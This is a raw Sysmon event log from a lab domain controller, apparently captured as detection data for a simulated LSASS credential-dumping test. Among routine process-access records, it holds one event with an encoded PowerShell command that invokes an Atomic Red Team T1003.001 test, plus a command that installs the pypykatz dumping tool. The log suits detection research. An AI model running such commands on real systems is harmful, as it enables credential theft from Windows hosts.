WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004596Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.725{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004595Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.725{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004594Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.678{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_i2qzcgc4.nbq.ps12020-11-03 15:52:54.678 10341000x80000000000000004593Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004592Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004591Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004590Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004589Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004588Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004587Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004586Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004585Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004584Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004583Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004582Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004581Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004580Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.646{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004579Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.652{D28789B6-7CD6-5FA1-E600-000000008801}3284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {pip3 install pypykatz} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004578Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD6-5FA1-E500-000000008801}4764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004577Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004576Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004575Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004574Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:54.615{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\K